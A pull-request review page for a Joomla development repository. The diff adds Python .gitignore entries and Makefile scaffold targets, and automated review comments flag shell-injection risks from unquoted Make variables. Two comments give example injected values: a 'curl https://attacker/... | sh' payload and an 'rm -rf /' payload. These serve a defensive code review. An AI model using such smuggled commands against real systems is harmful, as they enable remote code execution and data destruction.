Improve Joomla development workflows and convert scripts to Python #31
30
.gitignore
vendored
30
.gitignore
vendored
@@ -793,6 +793,36 @@ package-lock.json
|
|||||||
.phpunit.result.cache
|
.phpunit.result.cache
|
||||||
codeception.phar
|
codeception.phar
|
||||||
|
|
||||||
|
# Python
|
||||||
|
__pycache__/
|
||||||
|
*.py[cod]
|
||||||
|
*$py.class
|
||||||
|
*.so
|
||||||
|
.Python
|
||||||
|
build/
|
||||||
|
develop-eggs/
|
||||||
|
downloads/
|
||||||
|
eggs/
|
||||||
|
.eggs/
|
||||||
|
lib/
|
||||||
|
lib64/
|
||||||
|
parts/
|
||||||
|
sdist/
|
||||||
|
var/
|
||||||
|
wheels/
|
||||||
|
*.egg-info/
|
||||||
|
.installed.cfg
|
||||||
|
*.egg
|
||||||
|
MANIFEST
|
||||||
|
.pytest_cache/
|
||||||
|
.coverage
|
||||||
|
.coverage.*
|
||||||
|
htmlcov/
|
||||||
|
.tox/
|
||||||
|
.nox/
|
||||||
|
*.cover
|
||||||
|
.hypothesis/
|
||||||
|
|
||||||
# ============================================================
|
# ============================================================
|
||||||
# Keep-empty folders helper
|
# Keep-empty folders helper
|
||||||
# ============================================================
|
# ============================================================
|
||||||
|
|||||||
36
Makefile
36
Makefile
@@ -179,8 +179,42 @@ list-scripts:
|
|||||||
@echo "Available fix scripts:"
|
@echo "Available fix scripts:"
|
||||||
@find scripts/fix -type f -name "*.sh" -exec basename {} \; | sort
|
@find scripts/fix -type f -name "*.sh" -exec basename {} \; | sort
|
||||||
@echo ""
|
@echo ""
|
||||||
@echo "Available run scripts:"
|
@echo "Available run scripts (bash):"
|
||||||
@find scripts/run -type f -name "*.sh" -exec basename {} \; | sort
|
@find scripts/run -type f -name "*.sh" -exec basename {} \; | sort
|
||||||
|
@echo ""
|
||||||
|
@echo "Available run scripts (python):"
|
||||||
|
@find scripts/run -type f -name "*.py" -exec basename {} \; | sort
|
||||||
|
|
||||||
|
## scaffold: Create new Joomla extension scaffolding
|
||||||
|
scaffold:
|
||||||
|
@echo "Create new Joomla extension scaffolding"
|
||||||
|
@echo ""
|
||||||
|
@echo "Usage: make scaffold TYPE=<type> NAME=<name> AUTHOR=<author> DESC=<description>"
|
||||||
|
@echo ""
|
||||||
|
@echo "Types: component, module, plugin, template, package"
|
||||||
|
@echo ""
|
||||||
|
@echo "Example:"
|
||||||
|
@echo " make scaffold TYPE=module NAME='My Module' AUTHOR='John Doe' DESC='Module description'"
|
||||||
|
|
||||||
|
## scaffold-component: Create a component
|
||||||
|
scaffold-component:
|
||||||
|
@python3 scripts/run/scaffold_extension.py component "$(NAME)" "$(DESC)" "$(AUTHOR)"
|
||||||
|
|
||||||
|
## scaffold-module: Create a module
|
||||||
|
scaffold-module:
|
||||||
|
@python3 scripts/run/scaffold_extension.py module "$(NAME)" "$(DESC)" "$(AUTHOR)" --client $(CLIENT)
|
||||||
|
|
||||||
|
## scaffold-plugin: Create a plugin
|
||||||
|
scaffold-plugin:
|
||||||
|
@python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group $(GROUP)
|
||||||
|
|
|||||||
|
|
||||||
|
## scaffold-template: Create a template
|
||||||
|
scaffold-template:
|
||||||
|
@python3 scripts/run/scaffold_extension.py template "$(NAME)" "$(DESC)" "$(AUTHOR)"
|
||||||
|
|
||||||
|
## scaffold-package: Create a package
|
||||||
|
scaffold-package:
|
||||||
|
@python3 scripts/run/scaffold_extension.py package "$(NAME)" "$(DESC)" "$(AUTHOR)"
|
||||||
|
|
||||||
## docs: Open documentation
|
## docs: Open documentation
|
||||||
docs:
|
docs:
|
||||||
|
|||||||
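Review bot: The double quotes around `$(NAME)`, `$(DESC)` and `$(AUTHOR)` in the five `scaffold-*` recipes do not turn those values into data, because Make substitutes the text before the shell parses the line. A value containing a double quote, a backtick or `$(` is therefore still read as shell syntax. Passing the values through the environment keeps them out of the command text: add `export NAME DESC AUTHOR` next to the targets and reference them as shell variables, e.g. `@python3 scripts/run/scaffold_extension.py component "$$NAME" "$$DESC" "$$AUTHOR"`, with the same change in the other four recipes. Separately, the `scaffold` target only echoes text, so the documented `make scaffold TYPE=module ...` example prints the help again and creates nothing. The usage and example lines should name the real targets, for instance `make scaffold-module NAME='My Module' DESC='Module description' AUTHOR='John Doe'`.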
Binary file not shown.
Binary file not shown.
The 'scaffold-module' and 'scaffold-plugin' targets reference variables 'CLIENT' and 'GROUP' respectively, but these variables don't have default values. If a user runs these targets without specifying the variables (e.g., 'make scaffold-module NAME="Test"'), the command will pass empty values to the Python script. Consider adding default values (e.g., 'CLIENT ?= site' and 'GROUP ?= system') or documenting that these must be provided.
In the `scaffold-module` target, the `$(CLIENT)` variable is interpolated into the shell command without quoting (`--client $(CLIENT)`), which allows shell metacharacters in `CLIENT` to break out of the intended argument and execute arbitrary commands (e.g. `CLIENT="site; curl https://attacker/... | sh"`). If an attacker can influence `CLIENT` (via environment variables or `make` arguments in an automated context), running `make scaffold-module` results in remote code execution under the developer's account. Treat `CLIENT` as untrusted and ensure it is safely passed as data (for example by quoting it and avoiding any expansion that lets the shell interpret its contents as additional arguments or commands).

In the `scaffold-plugin` target, the `$(GROUP)` variable is used unquoted in the shell command (`--group $(GROUP)`), so a malicious value containing shell metacharacters can inject extra arguments or commands (e.g. `GROUP="system; rm -rf /"`). If `GROUP` is influenced by external input (environment variables, wrapper scripts, or CI parameters), invoking `make scaffold-plugin` can lead to arbitrary command execution. Treat `GROUP` as untrusted input and ensure it is safely handled (for example by quoting it so the shell cannot interpret its contents beyond a single argument).